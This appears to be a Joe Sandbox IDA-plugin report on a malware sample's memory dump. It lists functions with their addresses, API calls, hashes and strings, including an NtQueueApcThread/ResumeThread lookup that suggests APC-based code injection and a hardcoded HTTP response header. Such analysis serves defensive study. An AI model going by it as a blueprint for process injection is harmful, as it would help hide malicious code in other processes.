Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Thread$Context$Resume
String ID:
API String ID: 1758964557-0
Opcode ID: 47e75b3e4a0b68d7fcf2b46edb3e1c0b3662b0cb436c7ebb95251cbeea04a70d
Instruction ID: 2971ea1bc426b0cd31ab4304d6ff96e0900cebb0f34ac4482ec1849e90af85be
Opcode Fuzzy Hash: 47e75b3e4a0b68d7fcf2b46edb3e1c0b3662b0cb436c7ebb95251cbeea04a70d
Instruction Fuzzy Hash: CC318132308B8682E722DB15B4443AE72B4FB88BD0F648135DADD47B44DF38CA49C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73C5C0 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA73C517

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73C522
_getstream.LIBCMT ref: 0000017DEA73C542
_errno.LIBCMT ref: 0000017DEA73C554
_errno.LIBCMT ref: 0000017DEA73C566
_openfile.LIBCMT ref: 0000017DEA73C594

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 835e35de52116243c5232cdf7460fa3a6cc22b4b2a138782764f63ca95174e3a
Instruction ID: ff18c5401c576b9dbd83f49ee763a7fa836e48a91e167845428a2d35980d04c4
Opcode Fuzzy Hash: 835e35de52116243c5232cdf7460fa3a6cc22b4b2a138782764f63ca95174e3a
Instruction Fuzzy Hash: B321537121D68B45FB13FB2279013BE6AB16FC47C0F65443099CD9B786DF28C6194712

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72F810 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA72F831

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

free.LIBCMT ref: 0000017DEA72F86C
fwrite.LIBCMT ref: 0000017DEA72F8AD
fclose.LIBCMT ref: 0000017DEA72F8B5
free.LIBCMT ref: 0000017DEA72F8C2

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

GetLastError.KERNEL32 ref: 0000017DEA72F8C7

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: fe4bbc95ef4b08574859fefc5ba918ca2079e897777f34b89423cbeb1ae88b9b
Instruction ID: 89a60d2a68493257fbb524fa50e3aee5f1e4a7742c91ea66b99ae5660f419f83
Opcode Fuzzy Hash: fe4bbc95ef4b08574859fefc5ba918ca2079e897777f34b89423cbeb1ae88b9b
Instruction Fuzzy Hash: F5116F7130864A41E912F762B0103FE96B0AFC5BE0F554231AADE4F7CADE28C7098742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73B0E4 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA73B107

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

malloc.LIBCMT ref: 0000017DEA73B115

Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B2BC
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2C1

malloc.LIBCMT ref: 0000017DEA73B137
_snprintf.LIBCMT ref: 0000017DEA73B152

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

malloc.LIBCMT ref: 0000017DEA73B16D

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0000017DEA73B13C

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: 28f7500e5a57a94553abab49d0b41e4cfd04cc5b26ced466caba407a8288f66b
Instruction ID: fa66d19b3191ef641f54e2d86ee9d2101b7e3ed58ababbbf8185d825ecc22220
Opcode Fuzzy Hash: 28f7500e5a57a94553abab49d0b41e4cfd04cc5b26ced466caba407a8288f66b
Instruction Fuzzy Hash: 20012531708B5940E642EB02B4003AD6AB8EBC8BD0F118329EEAD4F7C2CE38C1014740

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA3235B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA323604

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

malloc.LIBCMT ref: 0000017DEA32360F

Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A703
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A708

free.LIBCMT ref: 0000017DEA3236F6
free.LIBCMT ref: 0000017DEA3236FE
free.LIBCMT ref: 0000017DEA323706
free.LIBCMT ref: 0000017DEA323712
free.LIBCMT ref: 0000017DEA32371F

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
Instruction ID: be3d2bdd2ba7c5e5ef9ce7cf05aaa2715373f2f0b110511d5878748047fd1382
Opcode Fuzzy Hash: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
Instruction Fuzzy Hash: 7651A53061CF0E4FE79AAA6CA4916BAB2F4FF89700F40012DD44EC7293EE14DD5686C6

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA724170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA7241BD

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

malloc.LIBCMT ref: 0000017DEA7241C8

Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B2BC
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2C1

free.LIBCMT ref: 0000017DEA7242AF
free.LIBCMT ref: 0000017DEA7242B7
free.LIBCMT ref: 0000017DEA7242BF
free.LIBCMT ref: 0000017DEA7242CB
free.LIBCMT ref: 0000017DEA7242D8

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
Instruction ID: 98097c39e3e40eb060e80c73122a24eae44ec82f5876827583a7c3335b056821
Opcode Fuzzy Hash: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
Instruction Fuzzy Hash: 3A41CF3630865B97EA56EA63B9403B927B0BBC5B80F904130DE8E4F751DF34DA66C316

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72EE74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 0000017DEA72EEED
htonl.WS2_32 ref: 0000017DEA72EEF7
malloc.LIBCMT ref: 0000017DEA72EF10
free.LIBCMT ref: 0000017DEA72EF7D

Strings

zyxwvutsrqponmlk, xrefs: 0000017DEA72EF4C

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
Instruction ID: 67243290b2f912d7cb1feae597f09384879aee9b92cc48481ed525c420567001
Opcode Fuzzy Hash: 60e827709e15f071cf2e6c3d2d1b9052fe80b1463481f4d5e0851a6ab7a4111b
Instruction Fuzzy Hash: 4931F47230864A42FB46FA62B5513F96AB19FD8BD0F154034AECD8B797DE38CA468301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7324E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA73250C
GetProcAddress.KERNEL32 ref: 0000017DEA73251C
ResumeThread.KERNEL32 ref: 0000017DEA732549

Strings

ntdll, xrefs: 0000017DEA7324FF
NtQueueApcThread, xrefs: 0000017DEA732512

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcResumeThread
String ID: NtQueueApcThread$ntdll
API String ID: 682313787-1374908105
Opcode ID: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
Instruction ID: fd6653cc47a794dff0aa00c94e541287b2f69a162ca761ed9366fcd90051ee62
Opcode Fuzzy Hash: e7e6c475633100eece6753356ed918a7e6f8eaece10a8f42ca503db20b9cac72
Instruction Fuzzy Hash: CC017131308B4782EA02EB56F8501A9A3B0FBD8BD0F944531DA9D4BB54DF38C6558701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA731254 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA731276

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

_snprintf.LIBCMT ref: 0000017DEA731295

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

remove.LIBCMT ref: 0000017DEA7312A1
remove.LIBCMT ref: 0000017DEA7312A8

Strings

%s\%s, xrefs: 0000017DEA73127B

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
Instruction ID: f25fc853ebcc2ca475ec06a730ad9fd5f922e0e0cf2a741fa9939e1c2a3f34bd
Opcode Fuzzy Hash: ffc5b049335742fc71228dd6e777388c78786af3e347fc27d6e655662866bbaa
Instruction Fuzzy Hash: 5BF04F3160865985E612FB51B8002FAA770AFC4BD0F694630AFCC1BB46CE38C6054746

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA32BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA333B67: malloc.LIBCMT ref: 0000017DEA333B83

malloc.LIBCMT ref: 0000017DEA32BF65

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

Part of subcall function 0000017DEA33A047: malloc.LIBCMT ref: 0000017DEA33A097

Part of subcall function 0000017DEA33A047: realloc.LIBCMT ref: 0000017DEA33A0A6

malloc.LIBCMT ref: 0000017DEA32C057
_snprintf.LIBCMT ref: 0000017DEA32C0D5
_snprintf.LIBCMT ref: 0000017DEA32C0FD
_snprintf.LIBCMT ref: 0000017DEA32C124
free.LIBCMT ref: 0000017DEA32C292

Part of subcall function 0000017DEA3386F3: malloc.LIBCMT ref: 0000017DEA338727
Part of subcall function 0000017DEA3386F3: free.LIBCMT ref: 0000017DEA3388DE

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
Instruction ID: dff39d75753dbea3ed52d89fd089ee7df6c76e54584dcac8ebc04987b30f76c4
Opcode Fuzzy Hash: 479da97b01b779146c38a62a3070aff10b568b1b266dc2a7db8f21ac3f222f97
Instruction Fuzzy Hash: B0C1523060C60E4BEB5ABBA4A4567FD72F5EFD5300F404529E45E8B2D3EE389A098653

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA32FD7F Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0000017DEA333B67: malloc.LIBCMT ref: 0000017DEA333B83

Part of subcall function 0000017DEA33BA07: _errno.LIBCMT ref: 0000017DEA33B95E
Part of subcall function 0000017DEA33BA07: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33B969

fseek.LIBCMT ref: 0000017DEA32FE1B

Part of subcall function 0000017DEA33C28B: _errno.LIBCMT ref: 0000017DEA33C2B3
Part of subcall function 0000017DEA33C28B: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33C2BE

_ftelli64.LIBCMT ref: 0000017DEA32FE23

Part of subcall function 0000017DEA33C2FF: _errno.LIBCMT ref: 0000017DEA33C31D
Part of subcall function 0000017DEA33C2FF: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33C328

fseek.LIBCMT ref: 0000017DEA32FE33

Part of subcall function 0000017DEA33C28B: _fseek_nolock.LIBCMT ref: 0000017DEA33C2DC

malloc.LIBCMT ref: 0000017DEA32FE73

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

fclose.LIBCMT ref: 0000017DEA32FF30

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
Instruction ID: 9c3179c711d30dd0056c40cf5ecf9be6bf9eca107fe9542b1d791ec45fe119d3
Opcode Fuzzy Hash: 7b4d7289a34a9255c824d7eaa77b2ff1df567971f9fd99a7ac6ed81b33217d28
Instruction Fuzzy Hash: A451633161CA0D4BE74AEB68B4557FA72F1EFC9700F50462EE44FC7296DD249A068683

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA34553B Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0000017DEA345568

Part of subcall function 0000017DEA33F03F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33F05C
Part of subcall function 0000017DEA33F03F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33F066

_lock.LIBCMT ref: 0000017DEA34557B
_lock.LIBCMT ref: 0000017DEA3455D6
_calloc_crt.LIBCMT ref: 0000017DEA34568D

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
Instruction ID: c462540a30ef74376682ee0d1a727f7bd63667fedd2a1c948aec12511a81a6eb
Opcode Fuzzy Hash: 3f7d7383109a2b023e6d9ae3b720316474c0133ef7fa5bdb011a38a708de0ad6
Instruction Fuzzy Hash: D551D63091CA0A8BE7559F58E8853B5B7F0FF94310F55025DE84ECB2A2DE38DD428A82

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA324937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA324981

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

malloc.LIBCMT ref: 0000017DEA32498C

Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A703
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A708

free.LIBCMT ref: 0000017DEA324A73
free.LIBCMT ref: 0000017DEA324A7B
free.LIBCMT ref: 0000017DEA324A87
free.LIBCMT ref: 0000017DEA324A94

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
Instruction ID: 1d770d5c2d26607bd3e5a9f07803dee99a4bb51ed4b2494d024b6c550eb6c6b0
Opcode Fuzzy Hash: ddbb960c4c1ee8468c6250dc08bf5515ef5a4ba7345911af3a06a17fc36967dd
Instruction Fuzzy Hash: DB412A3061CB0E4BE76AAAAD64457BA72F5EFD6310F10012DD48FC7293EE24D9074796

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33C044 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33BF3E
memcpy_s.LIBCMT ref: 0000017DEA33C003
_fileno.LIBCMT ref: 0000017DEA33C06E

Part of subcall function 0000017DEA340C3B: _errno.LIBCMT ref: 0000017DEA340C44
Part of subcall function 0000017DEA340C3B: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA340C4F

Part of subcall function 0000017DEA34211F: __doserrno.LIBCMT ref: 0000017DEA342159
Part of subcall function 0000017DEA34211F: _errno.LIBCMT ref: 0000017DEA342160

_filbuf.LIBCMT ref: 0000017DEA33C09C
_errno.LIBCMT ref: 0000017DEA33C0EC

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
String ID:
API String ID: 1812282339-0
Opcode ID: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
Instruction ID: c9e208b0c34e25b0420dde7dde0c0a44c2b16444d883b7be300f34ae01ba1635
Opcode Fuzzy Hash: 8b1461345f166dcaacafda40ee5fb0560b219fd4bf31384df6ca32e7d4f873f7
Instruction Fuzzy Hash: DB41C93121CA4E4AE62B55AC64452B9B6F1EFD5720F24032ED4BEC72E2DE10D95A46C3

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33D4DB Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 0000017DEA33D4F8

Part of subcall function 0000017DEA340C3B: _errno.LIBCMT ref: 0000017DEA340C44
Part of subcall function 0000017DEA340C3B: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA340C4F

_errno.LIBCMT ref: 0000017DEA33D508

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_errno.LIBCMT ref: 0000017DEA33D524
_isatty.LIBCMT ref: 0000017DEA33D585
_getbuf.LIBCMT ref: 0000017DEA33D591

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
Instruction ID: 5c12f13469cf54c8a24613771a6cc23e7e33e18ad0f151750f4455789160a1f5
